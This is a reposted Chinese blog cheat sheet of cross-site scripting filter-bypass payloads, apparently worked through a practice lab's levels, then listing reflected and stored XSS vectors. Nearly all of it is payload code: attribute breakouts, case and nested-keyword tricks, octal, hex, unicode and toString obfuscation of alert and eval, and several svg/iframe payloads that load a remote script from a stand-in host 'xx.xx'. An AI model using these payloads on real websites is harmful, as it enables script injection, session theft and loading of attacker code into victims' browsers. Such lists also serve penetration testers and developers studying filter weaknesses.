XSS绕过常见方式

XSS绕过常见方式

转载自https://www.cnblogs.com/bingtang123/p/12844659.html

XSS常见方式

1.<script>alert(1)</script>
2.源码第一个,[<]被转义,因此在第二个里
"><script>alert(1)</script><a class="
3.源码对第一个,第二个对[<]做了转义,是单引
<input name=keyword value='  '>' onfocus='alert(1)<input name=keyword value='' onfocus='alert(1)'>
4.<input name=keyword value="  ">" onfocus="alert(1)<input name=keyword value=""  onfocus="alert(1)">
5.双引号,对on进行过滤
"><ScRiPt>alert(1)</script><a class="
6.对script进行过滤
<input name=keyword value="  ">"><a href="javascript:alert(1)">点击我</a class="<input name=keyword value=" "><a href="javascript:alert(1)">点击我</a class=" ">
7.对href进行了过滤
<input name=keyword value="  ">"><ScRiPt>alert(1)</script><a class="<input name=keyword value=""><ScRiPt>alert(1)</script><a class="">
8.对script进行过滤
<input name=keyword value="  ">"><scrscriptipt>alert(1)</scscriptript><a class="<input name=keyword value=""><scrscriptipt>alert(1)</scscriptript><a class="">
9.对script进行了过滤,使用伪事件(用tab进行反过滤)
<a href="  ">javascript:alert(1)<a href="javascript:alert(1)">
10.发现只有使用http://,且他们为完整的就行,伪事件(将r转化为10进制)
<a href="  ">javascript:alert('http://')<a href="javascript:alert('http://')">
11.有三个input标签被隐藏
<input name="t_sort" value="333" type="hidden">&t_sort=333" onclick=alert(1) type="text<input name="t_sort"  value="333" onclick=alert(1)type="text " type="hidden">

<script>alert('xss')</script>  最简单常用的poc
    "><script>alert(1)<script>
    <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗
    <img src=http://1.1.1.1/a.ipg onerror=alert('xss')> 加载图片,给一个错误的图片地址,错误则执行弹窗
    <script>window.location=‘http://1.1.1.1'</script> 重定向到指定的url地址
    <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe> 
    onmouseover=alert(document.domain)    闭合属性,构造on事件
    onmousemove=alert(1)

    <input type=”text ”  onfocus=prompt(1) autofocus>

    利用input的autofocus属性,无需用户交互即可触发xss.
    htmlspecialchars:输入常用符号,看哪些符号没被实体编码。
    如输入在herf或src里面:javascript:alert(1)
    js输出,输入的数据由js变量接收,通过</script>闭合即可

反射性
<script>alert(‘xss’)</script>
<a href='' onclick=alert('xss')>type</a>
<img src=1 onerror=alert(1)>
<SCRIPT>alert(1)</SCRIPT>
<Sscriptcript>alert(1)</Sscriptcript>
遗漏标签
<details open ontoggle=top['al'%2B'ert'](1) >
<details open ontoggle=self['al'%2B'ert'](1) >
<details open ontoggle=parent['al'%2B'ert'](1) >
<details open ontoggle=frames['al'%2B'ert'](1) >
<details open ontoggle=content['al'%2B'ert'](1) >
<details open ontoggle=window['al'%2B'ert'](1) >

JS8编码:
<details open ontoggle=top['al\145rt'](1) >
<details open ontoggle=top['\141\154\145\162\164'](1) >
JS16编码:
<details open ontoggle=top['al\x65rt'](1) >
其他
<details open ontoggle=top[/al/.source%2B/ert/.source](1) >

toString()
<details open ontoggle=top[8680439..toString(30)](1); >
<details open ontoggle=top[11189117..toString(32)](1); >

<img src=1 alt=al lang=ert onerror=top[alt%2blang](0)>
<details open ontoggle=top[a='al',b='ev',b%2ba]('alert(1)')>

将alert(1)编码,因为有eval存在
<details open ontoggle=top[a='al',b='ev',b%2ba](atob('YWxlcnQoMSk='))>
<details open ontoggle=top[a='al',b='ev',b%2ba]('\141\154\145\162\164\50\61\51')>
<details open ontoggle=top[a='al',b='ev',b%2ba]('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>

eval函数的补充
<svg/onload=setTimeout`alert\u0028233\u0029`>
<svg/onload=setInterval('al'%2b'ert(1)')>
拆分与编码
<svg/onload=\u0073etInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>
<svg/onload=\u0073etInterval(appendChild(createElement('sc\162ipt')).src='http://xx.xx/eeW')>
<svg/onload=\u0073etInterval(appendChild(createElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
<svg/onload=\u0073etInterval(\u0061ppendChild(\u0063reateElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
结合函数:
<iframe onload=s=createElement('script');body.appendChild(s);s.src=['http','://','xx.xx','/eeW'].join('') >
<svg/onload=s=createElement('script');body.appendChild(s);s.src=['http']%2B['://']%2B['xx.xx']%2B['/eeW'].join('') >
<svg/onload=s=\u0063reateElement('scr'%2b'ipt');\u0062ody.\u0061ppendChild(s);s.src='http://x'.concat('x.xx/','eeW'); >

constructor属性
<svg/onload=Set.constructor('al'%2b'ert(1)')()>
<svg/onload=Set.constructor(appendChild(createElement('script')).src='http://xx.xx/eeW')()>

<svg/onload=Set.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=Map.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=clear.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=Array.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=WeakSet.constructor`al\x65rt\x28/xss/\x29```>


存储型
<script>alert(‘xss’)</script>
<a href='' onclick=alert('xss')>type</a>
<img src=1 onerror=alert(1)>
<SCRIPT>alert(1)</SCRIPT>
<Sscriptcript>alert(1)</Sscriptcript>
<a href=javascript:alert(1)>a</a>
<a href=javascript:alert(1)>a</a>
$nickname = htmlentities(@$_POST['nickname']);//昵称
posted @ 2021-08-12 19:58  tomyyyyy  阅读(668)  评论(0编辑  收藏  举报